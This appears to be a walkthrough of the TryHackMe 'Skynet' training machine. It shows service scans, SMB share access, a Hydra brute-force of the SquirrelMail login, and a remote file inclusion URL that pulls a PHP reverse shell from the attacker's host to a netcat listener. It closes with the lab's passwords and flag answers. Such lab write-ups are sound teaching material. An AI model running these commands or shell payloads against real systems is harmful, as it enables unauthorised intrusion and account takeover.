Amazing TryHackMe SkyNet WriteUp

TryHackMe SkyNet WriteUp

TryHackMe Skynet is a vulnerable Terminator themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attack samba share, RFI attacks and privilege escalation.

TryHackMe SkyNet WriteUp

Start the Machine

Before everything we need to start our machine and wait around a minute to start our recon phase. After the machine is up and running it’s time to scan the box.

Scan the Target Machine

To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.

nmap -sV -sC -A -p- 10.10.131.16

Analyse Nmap Scan results

After running the nmap scan I notice a few open ports and four main services – SSH , Apache, Dovecot, Samba.

tryhackme nmap scan skynet
  • 22/tcp SSH
  • 80/tcp HTTP
  • 110/tcp POP3
  • 139/tcp NetBIOS Samba
  • 143/tcp IMAP
  • 445/tcp NetBIOS Samba

Investigate Port 80 Apache/2.4.18

Open you browser with your Skynet Box IP and a skynet dummy search engine appear

TryHackMe Skynet Writeup Port 80 Dummy Search engine

I have tried search something but nothing happen. Analyzing the HTML code I can’t find nothing relevant!

html code

At this point we get nothing from the Webserver it’s time to search some folders and find something useful to explore.

Execute gobuster

To find new folders on the webserver I will use gobuster with a public list.

gobuster dir -u http://10.10.131.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Amazing TryHackMe SkyNet WriteUp 59

After running the gobuster we got some useful folders to investigate but only one can be open, the squirrelmail folder!

Info to Explore

  • folder squirrelmail

Investigate Dovecot

Open the browser and access the squirrelmail folder it will open a login page and show us the SquirrelMail version 1.4.23

http://10.10.131.16/squirrelmail
TryHackMe SkyNet Squirrelmail

At this point we have the version of squirrel service and a login page but no clue of any username or email I’ve try some basic SQLi but without success. It’s time try the next service available Samba.

Investigate Samba

To investigate the Samba service I usully use the SMBMap tool or Nmap.

smbmap -H 10.10.131.16
SMBMap skynet

After executing smbmap we got some juicy info, we can Read the anonymous share and there is a interesting share with the name milesdyson but we don’t have access to it.

Wait? milesdyson sound like a username for me, maybe can be used on Squirrelmail login page. keep it in mind for now I will investigate the anonymous share maybe I can find some useful file.

Connect to anonymous Share

For now let’s connect to the anonymous share with SMBClient using the command:

smbclient //10.10.131.16/anonymous

We are in let’s list the files available and search…

Anonyous share output

We have one file and one folder to investigate.

cat attention.txt
attention.txt file output

We can confirm our suspects the user Miles Dyson exists.

log1.txt output

Log1.txt file looks like a password list file and maybe can be used as a wordlist to bruteforce the squirrelemail login page, let’s try it.

Brute force Squirrel login with Hydra

Here we will test the milesdyson as username a log1.txt file as a wordlist.

hydra -l milesdyson -P log1.txt 10.10.131.16 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u
Brute force Squirrel login

After a successful brute force attack against squirrel we can login with user milesdyson and password cyborg007haloterminator

Squirrel Dashboard

Open first email and extract Samba password

TryHackMe Skynet Samba Password

Connect to milesdyson Share

smbclient //10.10.131.16/milesdyson -U milesdyson

Insert the Password-> )s{A&2Z=F^n_E.B`
Read Samba Share MilesDyson

Only PDF files and a folder called notes let’s list it

One file looks interesting important.txt

read important.txt file

The important.txt file mention some new directory /45kra24zxs28v3yd open it and we have the Miles Dyson homepage.

Miles Dyson Personal Page

gobuster o find this administrator page

gobuster dir -u http://10.10.131.16/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Amazing TryHackMe SkyNet WriteUp 60
Open http://10.10.131.16/45kra24zxs28v3yd/administrator

Cuppa CMS Exploit

Find some usefull exploit to run on Cuppa CMS

searchsploit cuppa
Cuppa CMS Exploit

Select Reverse Shell

Here I will copy the PHP Reverse Shell into my homefolder and then start a python webserver to

cp /usr/share/webshells/php/php-reverse-shell.php ~

Change the webshell values IP and Port if needed.

Edit PHP reverse Shell
cd /home/user
python3 -m http.server 801
http://10.10.131.16/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.php

Open a new terminal and use netcat or metasploit o listen on port 1234

nc -l 1234
cd milesdyson
cat user.txt

Our session is limited to the user webserver is running www-data, we need to find a way to elevate privileges but before that let’s brute force the Samba share milesdyson.

Brute Force Samba Service

hydra -l milesdyson -P log1.txt 10.10.131.16 smb -V

No success brute forcing the milesdyson share, OK let’s be more intrusive.

Privilege Escalation

Using Exploit

Search exploit to out kernel version

searchsploit kernel 4.8.0
search kernel exploit
Amazing TryHackMe SkyNet WriteUp 61

Using Crontab

Root Flag

cat /root/root.txt

Answer Questions

Now its time to answer the CTF questions

Skynet Questions

What is Miles password for his emails?

cyborg007haloterminator

What is the hidden directory?

/45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

What is the user flag?

7ce5c2109a40f958099283600a9aeXXX

What is the root flag?

3f0372db24753accc7179a282cd6aXXX

Linux Kernel 4.8.0 UDEV < 232 – Local Privilege Escalation

Register TryHackMe HERE